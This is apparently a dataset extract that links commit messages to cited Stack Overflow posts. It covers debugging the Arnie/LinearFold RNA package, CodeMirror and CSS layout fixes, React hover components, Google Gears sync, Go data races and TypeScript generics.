seq = &amp;quot;GGCGGAUGCAUGGAGCUAAUGGCUGUAGCUCA&amp;quot;
# Attempt to call LinearFold
result = bpps(seq, package=&amp;quot;linearfold_v&amp;quot;)
print(result)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Still raises:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;KeyError: 'linearfold_v'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;indicating &lt;code&gt;linearfold_v&lt;/code&gt; is not being recognized in &lt;strong&gt;Arnie's package system&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;3. Checked &lt;code&gt;package_options.py&lt;/code&gt; for Proper Inclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In &lt;code&gt;package_options.py&lt;/code&gt;, I verified that &lt;strong&gt;linearfold_v&lt;/strong&gt; is listed:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;package_options = {
    'vienna': {'package': 'vienna'},
    'vienna_2': {'package': 'vienna_2'},
    'contrafold_1': {'package': 'contrafold_1'},
    'linearfold_v': {'package': 'linearfold', 'type': 'v'},
    'linearfold_c': {'package': 'linearfold', 'type': 'c'},
    'linearfold_e': {'package': 'linearfold', 'type': 'e'},
    'linearpartition_v': {'package': 'linearpartition', 'type': 'v'},
    'linearpartition_c': {'package': 'linearpartition', 'type': 'c'},
    'linearpartition_e': {'package': 'linearpartition', 'type': 'e'}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This suggests that &lt;strong&gt;linearfold_v is defined, but not being properly registered within Arnie&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;4. Verified &lt;code&gt;arnie_config.txt&lt;/code&gt; Contains LinearFold Paths&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;I checked my &lt;strong&gt;&lt;code&gt;arnie_config.txt&lt;/code&gt;&lt;/strong&gt; file, located at:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/.arnie_config.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and ensured it includes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;vienna: /home/vboxuser/miniconda3/envs/rna_env/bin/RNAfold
linearfold: /home/vboxuser/LinearFold/bin/linearfold
linearfold_v: /home/vboxuser/LinearFold/bin/linearfold_v
linearfold_c: /home/vboxuser/LinearFold/bin/linearfold_c
linearfold_e: /home/vboxuser/LinearFold/bin/linearfold_e
linearpartition: /home/vboxuser/LinearPartition/bin/linearpartition
eternafold: /home/vboxuser/miniconda3/envs/rna_env/bin/eternafold
TMP: ./tmp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To verify if Arnie &lt;strong&gt;recognizes LinearFold&lt;/strong&gt;, I ran:&lt;/p&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;python -c &amp;quot;import arnie.utils; print(arnie.utils.load_package_locations())&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Output:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;linearfold_v&lt;/code&gt; &lt;strong&gt;does not appear&lt;/strong&gt;, meaning Arnie is not detecting it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Questions:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Is there another step needed to register new packages in Arnie?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How can I force Arnie to recognize LinearFold from &lt;code&gt;arnie_config.txt&lt;/code&gt;?&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;5. Debugging Statements Confirm Package Is Not Found&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;After adding debugging print statements to &lt;code&gt;bpps.py&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DEBUG: Linear is set to True, checking package: linearfold_v
DEBUG: Unexpected package linearfold_v for linear processing!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This confirms that &lt;strong&gt;Arnie is not detecting &lt;code&gt;linearfold_v&lt;/code&gt; as a valid package&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;6. Current Error Output&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Running:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;from arnie.bpps import bpps
seq = &amp;quot;GGCGGAUGCAUGGAGCUAAUGGCUGUAGCUCA&amp;quot;
result = bpps(seq, package=&amp;quot;linearfold_v&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Results in:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Traceback (most recent call last):
  File &amp;quot;&amp;lt;stdin&amp;gt;&amp;quot;, line 1, in &amp;lt;module&amp;gt;
  File &amp;quot;/home/vboxuser/miniconda3/envs/rna_env/lib/python3.9/site-packages/arnie/bpps.py&amp;quot;, line 67, in bpps
    else: _, tmp_file = pfunc(sequence, package=package, bpps=True, linear=linear, ...)
KeyError: 'linearfold_v'
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;What I Need Help With&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Why is &lt;code&gt;bpps.py&lt;/code&gt; not recognizing &lt;code&gt;&amp;quot;linearfold_v&amp;quot;&lt;/code&gt;, even though itâ€™s in &lt;code&gt;package_options.py&lt;/code&gt;?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How do I correctly add LinearFold to &lt;code&gt;arnie_config.txt&lt;/code&gt; so Arnie can detect it?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Are there additional files or methods in Arnie that I need to modify to register a new package?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;What other debugging steps should I try to ensure LinearFold is properly recognized?&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any help would be greatly appreciated!&lt;/p&gt;
&lt;p&gt;arnie/bpps.py code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import os, re, sys
import subprocess as sp
import random, string
import numpy as np
from .utils import *
from .pfunc import pfunc
# load package locations from yaml file, watch! global dict
package_locs = load_package_locations()
def bpps(sequence, package='vienna', constraint=None, pseudo=False,
         T=37, coaxial=True, linear=False, dna=False,
        motif=None, dangles=True,param_file=None,reweight=None, beam_size=100, DEBUG=False, threshknot=False,
        probing_signal=None, probing_kws=None,DIRLOC=None):
    ''' Compute base pairing probability matrix for RNA sequence.
    Args:
    sequence (str): nucleic acid sequence
    T (float): temperature (Celsius)
    linear (bool): call LinearPartition to estimate Z in Vienna or Contrafold
    constraint (str): structure constraint (functional in vienna, contrafold, rnastructure)
    motif (str): argument to vienna motif
    pseudo (bool): (NUPACK only) include pseudoknot calculation
    dangles (bool): dangles or not, specifiable for vienna, nupack
    dna (bool): (NUPACK only) use SantaLucia 1998 parameters for DNA
    coaxial (bool): coaxial stacking or not, specifiable for rnastructure, vfold
    noncanonical(bool): include noncanonical pairs or not (for contrafold, RNAstructure (Cyclefold))
    beam size (int): Beam size for LinearPartition base pair calculation.
    DEBUG (bool): Output command-line calls to packages.
    threshknot (bool): calls threshknot to predict pseudoknots (for contrafold with LinearPartition)
    Possible packages: 'vienna_2', 'vienna_1','contrafold_1','contrafold_2',
    'nupack_95','nupack_99','rnasoft_2007','rnasoft_1999','rnastructure','vfold_0','vfold_1'
    Returns
    array: NxN matrix of base pair probabilities
  '''
    package = package.lower()
    try:
        pkg, version = package.split('_')
    except:
        pkg, version = package, None
    if motif is not None and pkg != 'vienna':
        raise ValueError('motif option can only be used with Vienna.')
    if pseudo and pkg != 'nupack':
        raise ValueError('pseudoknot option only implemented with Nupack.')
    if not dangles and pkg not in ['vienna','nupack']:
        print('Warning: %s does not support dangles options' % pkg)
    if not coaxial and pkg not in ['rnastructure','vfold']:
        print('Warning: %s does not support coaxial options' % pkg)
    if linear and pkg not in ['vienna','contrafold','eternafold']:
        print('Warning: LinearPartition only implemented for vienna, contrafold, eternafold.')
    if pkg=='nupack':
        return bpps_nupack_(sequence, version = version, dangles = dangles, T = T, pseudo=pseudo, dna=dna)
    elif pkg=='vfold':
        return bpps_vfold_(sequence, version = version, T = T, coaxial = coaxial)
    elif package == &amp;quot;MyGreatPackage&amp;quot;:
        return bpps_myGreatPackage_(sequence, myNewArgument=myDefaultValue)
    else:
        _, tmp_file = pfunc(sequence, package=package, bpps=True, linear=linear,
            motif=motif, constraint=constraint, T=T, coaxial=coaxial, probing_signal=probing_signal, probing_kws=probing_kws, DIRLOC=package_locs[package],
             dangles=dangles, param_file=param_file,reweight=reweight, beam_size=beam_size, DEBUG=DEBUG, threshknot=threshknot)
        if linear:
            print(f&amp;quot;DEBUG: Linear is set to True, checking package: {package}&amp;quot;)
        if package in [&amp;quot;linearfold_v&amp;quot;, &amp;quot;linearfold_c&amp;quot;, &amp;quot;linearfold_e&amp;quot;]:
            print(f&amp;quot;DEBUGL Calling bpps_linearfold with {package}&amp;quot;)
            return bpps_linearfold(sequence, tmp_file)
        elif package in [&amp;quot;linearpartition_v&amp;quot;, &amp;quot;linearpartition_c&amp;quot;, &amp;quot;linearpartition_e&amp;quot;]
            print(f&amp;quot;DEBUGL Calling bpps_linearpartition with {package}&amp;quot;)
            return bpps_linearpartition_(sequence, tmp_file)
        else:
            if 'contrafold' in pkg:
                return bpps_contrafold_(sequence, tmp_file)
            if package=='eternafold':
                return bpps_contrafold_(sequence, tmp_file)
            elif 'vienna' in pkg:
                return bpps_vienna_(sequence, tmp_file)
            elif 'rnasoft' in pkg:
                return bpps_rnasoft_(sequence, tmp_file)
            elif 'rnastructure' in pkg:
                return bpps_rnastructure_(sequence, tmp_file, coaxial=coaxial)
            else:
                raise RuntimeError('package not yet implemented')
def bpps_vienna_(sequence, tmp_file):
    dot_fname = tmp_file
    probs=np.zeros([len(sequence), len(sequence)])
    with open(dot_fname,'r') as f:
        for line in f.readlines():
            if 'ubox' in line:
                try:
                    i, j, p, _ = line.split()
                    i, j, p = int(i)-1, int(j)-1, float(p)**2
                    probs[i,j] = p
                    probs[j,i] = p
                except:
                    pass
    os.remove(dot_fname)
    return probs
def bpps_contrafold_(sequence, tmp_file):
    fname = tmp_file
    probs=np.zeros([len(sequence), len(sequence)])
    for line in open(fname).readlines():
        if len(line.split(':')) &amp;gt; 1:
            first_ind = int(line.split()[0])-1
            for x in line.split()[2:]:
                second_ind = int(x.split(':')[0])-1
                p = float(x.split(':')[1])
                probs[first_ind, second_ind] = p
                probs[second_ind, first_ind] = p
    os.remove(fname)
    return probs
def bpps_rnasoft_(sequence, tmp_file):
    fname = tmp_file
    probs=np.zeros([len(sequence), len(sequence)])
    for line in open(fname).readlines():
        i,j,p = int(line.split()[0]), int(line.split()[1]), float(line.split()[2])
        probs[i,j] = p
        probs[j,i] = p
    os.remove(fname)
    return probs
def bpps_nupack_(sequence, version='95', T=37, dangles=True, pseudo=False,dna=False):
    if not version: version='95'
    nupack_materials={'95': 'rna1995', '99': 'rna1999'}
    if dna:
        material='dna1998'
    else:
        material=nupack_materials[version]
    DIR = package_locs['nupack']
    if dangles:
        dangle_option='some'
    else:
        dangle_option='none'
    seqfile = write([sequence])
    command=['%s/pairs' % DIR, '%s' % seqfile.replace('.in',''),
      '-T', str(T), '-material', material, '-dangles', dangle_option, '-cutoff', '0.0000000001']
    if pseudo:
        command.append('--pseudo')
    p = sp.Popen(command, stdout=sp.PIPE, stderr=sp.PIPE)
    stdout, stderr = p.communicate()
    if p.returncode:
        raise Exception('Nupack pfunc failed: on %s\n%s' % (sequence, stderr))
    ppairs_file = '%s.ppairs' % seqfile.replace('.in','')
    os.remove(seqfile)
    probs=np.zeros([len(sequence), len(sequence)])
    with open(ppairs_file, 'r') as f:
        for line in f.readlines():
            if not line.startswith('%'):
                fields = line.split()
                if len(fields) &amp;gt; 1:
                    if int(fields[1]) &amp;lt;= len(sequence):
                        i, j, p = int(fields[0])-1, int(fields[1])-1, float(fields[2])
                        probs[i,j] = p
                        probs[j,i] = p
    os.remove(ppairs_file)
    return probs
def bpps_rnastructure_(sequence, tmp_file, coaxial=True, DEBUG=False):
    DIR = package_locs['rnastructure']
    pfsfile = tmp_file #'%s/rnastructtmp.pfs' % package_locs['TMP']
    outfile = '%s.probs' % (tmp_file.replace('.pfs',''))
    command = ['%s/ProbabilityPlot' % DIR, pfsfile, outfile, '-t', '-min', '0.0000000001']
    probs=np.zeros([len(sequence), len(sequence)])
    if DEBUG: print(' '.join(command))
    p = sp.Popen(command, stdout=sp.PIPE, stderr=sp.PIPE)
    stdout, stderr = p.communicate()
    if DEBUG:
        print('stdout')
        print(stdout)
        print('stderr')
        print(stderr)
    if p.returncode:
        raise Exception('RNAstructure ProbabilityPlot failed: on %s\n%s' % (seq, stderr))
    with open(outfile, 'r') as f:
        for line in f.readlines()[2:]:
            fields = line.split()
            i, j, p = int(fields[0])-1, int(fields[1])-1, 10**(-1*float(fields[2]))
            probs[i,j] = p
            probs[j,i] = p
    os.remove(outfile)
    os.remove(pfsfile)
    return probs
def bpps_vfold_(sequence, version='0',T=37, coaxial=True, DEBUG=False):
    #available versions: 0 for Turner 04 params, 1 for Mfold 2.3 params
    DIR = package_locs[&amp;quot;vfold&amp;quot;]
    cwd = os.getcwd()
    os.chdir(DIR) #vfold precompiled binaries don't work being called from elsewhere
    if DEBUG: print(os.getcwd())
    seqfile = write([sequence])
    outfile = filename()+'.pij'
    if sys.platform==&amp;quot;linux&amp;quot;:
        platform='linux'
    elif sys.platform==&amp;quot;darwin&amp;quot;:
        platform='mac'
    elif sys.platform==&amp;quot;win32&amp;quot;:
        platform='win'
    else:
        raise RuntimeError('Vfold has binaries for linux, macOS, and win')
    command = ['./Vfold2d_npk_%s.o %d %d %s %s %d' % (platform, int(coaxial), T, seqfile, outfile, int(version))]
    if DEBUG: print(' '.join(command))
    p = sp.Popen(command, stdout=sp.PIPE, stderr=sp.PIPE, shell=True)
    stdout, stderr = p.communicate()
    os.chdir(cwd)
    if DEBUG:
        print('stdout')
        print(stdout)
        print('stderr')
        print(stderr)
    if p.returncode:
        raise Exception('Vfold2d_npk failed: on %s\n%s' % (sequence, stderr))
    os.remove(seqfile)
    probs = np.zeros([len(sequence),len(sequence)])
    p_ij_output = np.loadtxt(outfile,usecols=(0,2,3)) #col 0: set of inds 1, col 1: set of inds 2, col 2: bpp
    for i,j,p in p_ij_output:
        probs[int(i-1),int(j-1)] = p
        probs[int(j-1),int(i-1)] = p
    os.remove(outfile)
    return probs
    #output: take second field of last line for Z
def bpps_linearpartition_(sequence, tmp_file):
    fname = tmp_file
    probs=np.zeros([len(sequence), len(sequence)])
    for line in open(fname,'r').readlines():
        if len(line.strip())&amp;gt;0:
            first_ind, second_ind, p = line.strip().split(' ')
            first_ind = int(first_ind)-1
            second_ind = int(second_ind)-1
            p = float(p)
            probs[first_ind, second_ind] = p
            probs[second_ind, first_ind] = p
    os.remove(fname)
    return probs
def bpps_myGreatPackage_(sequence, myNewArgument=True):
    return bp_array
def bpps_linearfold(sequence):
    # Run LinearFold on a sequence and return base-pairing probabilities
    import subprocess
    linearfold_path = &amp;quot;/home/vboxuser/LinearFold/bin/linearfold_v&amp;quot; #Will change when running linearfold_c or e
    command = [linearfold_path, &amp;quot;--prob&amp;quot;, sequence]
    process = subprocess.run(command, text=True, capture_output=True)
    if process.returncode !=0:
        raise RuntimeError(f&amp;quot;Linearfold failed: {process.stderr}&amp;quot;)
    return process.stdout
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C402</t>
  </si>
  <si>
    <t>Fix visible password toggle
Extract outside of main component to avoid re-render when component re-renders (see https://stackoverflow.com/a/66307897/19215112)</t>
  </si>
  <si>
    <t xml:space="preserve">I want to create an application which will have a client and server components. The client may not be connected to the internet all the time, and hence will have to store data locally and then sync with the server whenever the internet connection is available. The data sync will be both ways: client to server and server to client.
Initially i thought making use of SQL Server Merge replication/Microsoft sync framework for ado.net and creating the client application using C# windows forms.
But Google Gears appears like a very good option, because it works with JavaScript and we just need build a asp.net web application which can then be used both on the client and the server. Plus it is available on Windows mobile 5 and 6, hence available on mobile devices as well.
But has any one used Google Gears in an enterprise scenario? Has any one faced any issues using Google Gears?
</t>
  </si>
  <si>
    <t>C403</t>
  </si>
  <si>
    <t>Break long words in CodeMirror (#2044)
* Break long words in CodeMirror
Credit to Marko Letic: https://stackoverflow.com/a/57377527
* Move rule to more general CodeMirror component</t>
  </si>
  <si>
    <t>Setting the
lineWrapping: true
in the CodeMirror options and
.CodeMirror-wrap pre {
    word-break: break-word;
}
in the CSS you use to override your editor's CSS will do the job.
In the case that the word is longer than the width of the editor it will break at the last character that fits. Something like this:
You can check out the example
here
, just keep in mind I built it for other purposes (and in Angular) but it also demonstrates your use-case.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;the following code will result in a data race detection when run with &lt;code&gt;go run -race main.go&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-golang prettyprint-override"&gt;&lt;code&gt;func main() {
    var values *map[string]string
    go func() {
        for {
            // First completely initialize the map
            newMap := make(map[string]string)
            newMap[&amp;quot;foo&amp;quot;] = &amp;quot;bar&amp;quot;
            // Write to shared pointer variable
            values = &amp;amp;newMap
            time.Sleep(time.Second)
        }
    }()
    go func() {
        for {
            // Save pointer variable
            savedMap := values
            if savedMap == nil {
                continue
            }
            // Do something with the hopefully safe map!
            fmt.Println(&amp;quot;savedMap:&amp;quot;, savedMap)
            time.Sleep(time.Second)
        }
    }()
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Snippet of output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;==================
WARNING: DATA RACE
Write at 0x00c000120f10 by goroutine 28:
  main.main.func1()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is: Is it really unsafe? Could I really end up with a mangled pointer address (one part of the new one and one part of the old one)?
Or is this just a &amp;quot;best-practice&amp;quot; kind of thing where doing this might result in hard to debug problems later when additional code does not adhere to the &amp;quot;contract&amp;quot;?&lt;/p&gt;
&lt;p&gt;In my use case I hardly ever update the pointer. 99.9% of the times this pointer will be read. So I hoped to not having to use synchronization features like atomic.Pointer/Mutexes and so on to safe on complexity and also surely performance (even though maybe minimally).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C404</t>
  </si>
  <si>
    <t>app components board: fix clue sizing
h-1 is magically necessary for w-full and h-full to work.
https://stackoverflow.com/questions/22220698/height-100-for-div-inside-div-with-display-table-cell</t>
  </si>
  <si>
    <t xml:space="preserve">When you use % for setting heights or widths, always set the widths/heights of parent elements as well:
.table {
    display: table;
    height: 100%;
}
.cell {
    border: 2px solid black;
    vertical-align: top;
    display: table-cell;
    height: 100%;
}
.container {
    height: 100%;
    border: 2px solid green;
    -moz-box-sizing: border-box;
}
&lt;div class="table"&gt;
    &lt;div class="cell"&gt;
        &lt;p&gt;Text
        &lt;p&gt;Text
        &lt;p&gt;Text
        &lt;p&gt;Text
        &lt;p&gt;Text
        &lt;p&gt;Text
        &lt;p&gt;Text
        &lt;p&gt;Text
    &lt;/div&gt;
    &lt;div class="cell"&gt;
        &lt;div class="container"&gt;Text&lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a few questions about data synchronization. The architecture
does not seem to be clear about this:
Does Google Gears provide from automatic synchronization of data
(from client to server and server to client)?
If it does provide for automatic data synchronization, then can i
write functions to hook into the sync mechanism (on the server and on
the client) to control what data is synced?
Is there anyway to partition the data on the server? for example a
client should be able to download only those rows in a table which are
related to it (for example there is 'hostname' column in the table,
and only those rows which contain the hostname of the client trying to
download the data should be downloaded to it)
Basically what I am looking for is: does Google Gears Synchronization
support the data synchronization features like SQL Server Merge
replication?
[ [external-link] ]
</t>
  </si>
  <si>
    <t>C405</t>
  </si>
  <si>
    <t>add ColorHit component and show it with mouse hook, ref from https://stackoverflow.com/questions/44566340/show-a-component-on-hover-in-reactjs</t>
  </si>
  <si>
    <t>You can use onMouseOver and onMouseOut to change the state and render a component conditionally based on the value of the state.
See it in action:
Hooks Implentation: https://codesandbox.io/s/react-hover-example-hooks-0to7u
Class Implemntation: https://codesandbox.io/s/XopkqJ5oV
Hooks:
import React, { useState } from "react";
import { render } from "react-dom";
const HoverableDiv = ({ handleMouseOver, handleMouseOut }) =&gt; {
  return (
    &lt;div onMouseOver={handleMouseOver} onMouseOut={handleMouseOut}&gt;
      Hover Me
    &lt;/div&gt;
  );
};
const HoverText = () =&gt; {
  return (
    &lt;div&gt;
      Hovering right meow!
      &lt;span role="img" aria-label="cat"&gt;
        🐱
      &lt;/span&gt;
    &lt;/div&gt;
  );
};
const HoverExample = () =&gt; {
  const [isHovering, setIsHovering] = useState(false);
  const handleMouseOver = () =&gt; {
    setIsHovering(true);
  };
  const handleMouseOut = () =&gt; {
    setIsHovering(false);
  };
  return (
    &lt;div&gt;
      {/* Hover over this div to hide/show &lt;HoverText /&gt; */}
      &lt;HoverableDiv
        handleMouseOver={handleMouseOver}
        handleMouseOut={handleMouseOut}
      /&gt;
      {isHovering &amp;&amp; &lt;HoverText /&gt;}
    &lt;/div&gt;
  );
};
Class:
import React, { Component } from "react";
import { render } from "react-dom";
const HoverableDiv = React.memo(({ handleMouseOver, handleMouseOut }) =&gt; {
  return (
    &lt;div onMouseOver={handleMouseOver} onMouseOut={handleMouseOut}&gt;
      Hover Me
    &lt;/div&gt;
  );
});
const HoverText = () =&gt; {
  return (
    &lt;div&gt;
      Hovering right meow!
      &lt;span role="img" aria-label="cat"&gt;
        🐱
      &lt;/span&gt;
    &lt;/div&gt;
  );
};
class HoverExample extends Component {
  constructor(props) {
    super(props);
    this.handleMouseOver = this.handleMouseOver.bind(this);
    this.handleMouseOut = this.handleMouseOut.bind(this);
    this.state = {
      isHovering: false
    };
  }
  handleMouseOver() {
    this.setState(() =&gt; ({
      isHovering: true
    }));
  }
  handleMouseOut() {
    this.setState(() =&gt; ({
      isHovering: false
    }));
  }
  render() {
    return (
      &lt;div&gt;
        {/* &lt;HoverText /&gt; gets shown when mouse is over &lt;HoverableDiv /&gt; */}
        &lt;HoverableDiv
          handleMouseOver={this.handleMouseOver}
          handleMouseOut={this.handleMouseOut}
        /&gt;
        {this.state.isHovering &amp;&amp; &lt;HoverText /&gt;}
      &lt;/div&gt;
    );
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to pass enforced-matching parameters to a method, that are a subtype of the return-type of that method (and class). I'm failing to do a couple of things,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;keeping the startValue and endValue matching each other's type&lt;/li&gt;
&lt;li&gt;aggregating the values onto the return type&lt;/li&gt;
&lt;li&gt;getting a return type that doesn't have partial undefined values.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;type Values = Record&amp;lt;string, number&amp;gt;
class Anim&amp;lt;T extends Partial&amp;lt;Values&amp;gt;&amp;gt; {
    transform({ startValues, endValues }: { startValues: T, endValues: T }) {
        const result = { ...startValues }
        for (const key in startValues) {
            // object possibly undefined
            const val = startValues[key] + endValues[key]
            // 'number' is assignable to the constraint of type 'T[Extract&amp;lt;keyof T, string&amp;gt;]', but 'T[Extract&amp;lt;keyof T, string&amp;gt;]'
            result[key] = val
        }
        return result
    }
}
type XY = { x: number, y: number }
class Point {
    anim = new Anim&amp;lt;XY&amp;gt;()
    transform(...args: Parameters&amp;lt;Anim&amp;lt;XY&amp;gt;[&amp;quot;transform&amp;quot;]&amp;gt;) {
        const val = { x: 0, y: 0 }
        const diff = this.anim.transform(...args)
        Object.keys(diff).forEach(key =&amp;gt; {
            // No index signature with a parameter of type 'string' was found on type '{ x: number; y: number; }'.
            val[key] = val[key] + diff[key]
        })
        return val
    }
}
const p = new Point()
const result = p.transform({
    // Property 'y' is missing in type '{ x: number; }' but required in type 'XY'.
    startValues: { x: 0 },
    endValues: { x: 10 }
})
const val = result.x + 5
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C406</t>
  </si>
  <si>
    <t>app components board clue: add better loading animation
Animate a boarder around the clue while it's loading.
https://stackoverflow.com/questions/48694894/drawing-border-colors-during-a-css-transition/48695388#48695388</t>
  </si>
  <si>
    <t xml:space="preserve">I would use multiple linear-gradient and a complex animation (by animating size/position of each one) to obtain the final result. If you get the trick you can easily adjust the different values to obtain any animation you want.
.draw {
  padding: 20px 50px;
  outline:none;
  border: none;
  box-shadow: none;
  background-image: 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#60daaa, #60daaa), 
  linear-gradient(#60daaa, #60daaa), 
  linear-gradient(#60daaa, #60daaa), 
  linear-gradient(#60daaa, #60daaa);
  background-position: 0 0, 0 0, 0 100%, 0 100%, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 0% 3px, 0% 3px, 3px 0%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  background-color:transparent;
  background-repeat:no-repeat;
  transition:0.2s linear;
}
.draw:hover {
  background-position: 0 100%, 0 0, 0 100%, 100% 0, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 0%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  animation: animate 1.4s linear infinite 0.2s;
}
@keyframes animate {
  0% {
  background-position: 0 100%, 0 0, 0 100%, 100% 0, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 0%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  }
  40% {
  background-position: 0 100%, 100% 0, 100% 100%, 100% 0, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 100%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  }
  60% {
  background-position: 0 100%, 100% 0, 100% 100%, 100% 100%, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 0% 3px, 100% 3px,3px 100%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  }
  70% {
  background-position: 0 100%, 100% 0, 0% 100%, 100% 100%, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 100%, 0% 3px, 100% 3px,3px 0%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  }
  80% {
  background-position: 0% 0%, 0% 0, 0% 100%, 100% 100%, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 100%, 0% 3px, 0% 3px,3px 0%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;
  }
  100% {
  background-position: 0% 0%, 0 0, 0 100%, 100% 100%, 
                       0 0, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 0%,  
                   3px 100%, 100% 3px, 100% 3px,3px 100%;  
  }
}
&lt;button class="draw"&gt;Draw&lt;/button&gt;
How does it work?
The structure: We have 8 linear-gradient. 4 will simply create the initial border and won't move (they are placed at the bottom layer) and 4 will be used to draw the line that will create our animation above the initial border (they are placed at the top layer).
The order is important as within background properties we will have 8 values each one for each gradient. You will notice the 3px value that will simply specify the width or height of each gradient (similar to the border-width) and it won't change during the animation.
The animation: I will adjust position/size of each gradient to create the animation. it's divided into 2 parts: a small transition and a big animation. The transition is simply used to create the initial state of the animation that's why the duration used for the transition is the same as the delay of the animation.
The first step is to animate the top border from left to right. To do this the gradient should be positioned at (0,0) [top,left] with a size of 0% 3px [width height]. Then I simply change the size to 100% 3px and I will get the needed animation (the 3px as described before won't change).
Now to animate the second border we do the same. We need a gradient positioned at (100%,0) [top,right] with a size of 3px 0% [width height] that we animate to 3px 100%:
Now since we have two borders we need to animate the third one AND hide the first one. I won't detail the third border as it's similar to the above ones so let's see how to hide the top one. The first intuitive idea is to simply set its size back to 0% 3px but this will simply create the inverse animation and thus we will have a right to left animation which is bad. The trick here is to adjust the position of the gradient to make it (100%,0) [top,right] instead of (0,0) as both positions are equivalent when the gradient is 100% size (so we do this at the previous step when animating the second one). Now, we can put back the size to 0% 3px and we will have a left to right animation:
We continue the same logic until we get back to the initial state and by specifying infinite in the animation property we will have the needed effect.
So the main Idea is to have a gradient with the size equal to 0% that we animate to full size (100%) in a given direction then we change its position (this won't have any effect on full size) and then animate back its size to 0. We mix this with the 4 gradients we have.
UPDATE
To avoid the confusing with all these gradient here is an update where I used a pseudo element for the static border thus we keep only 4 gradients for the animation:
.draw {
  position:relative;
  padding: 20px 50px;
  outline:none;
  border: none;
  box-shadow: none;
  background-image: 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#f45e61, #f45e61), 
  linear-gradient(#f45e61, #f45e61);
  background-position: 0 0, 0 0, 0 100%, 0 100%;
  background-size: 3px 0%, 0% 3px, 0% 3px, 3px 0%;
  background-color:transparent;
  background-repeat:no-repeat;
  transition:0.2s linear;
}
.draw:before {
  content:"";
  position:absolute;
  z-index:-1;
  top:0;
  right:0;
  left:0;
  bottom:0;
  border:3px solid #60daaa;
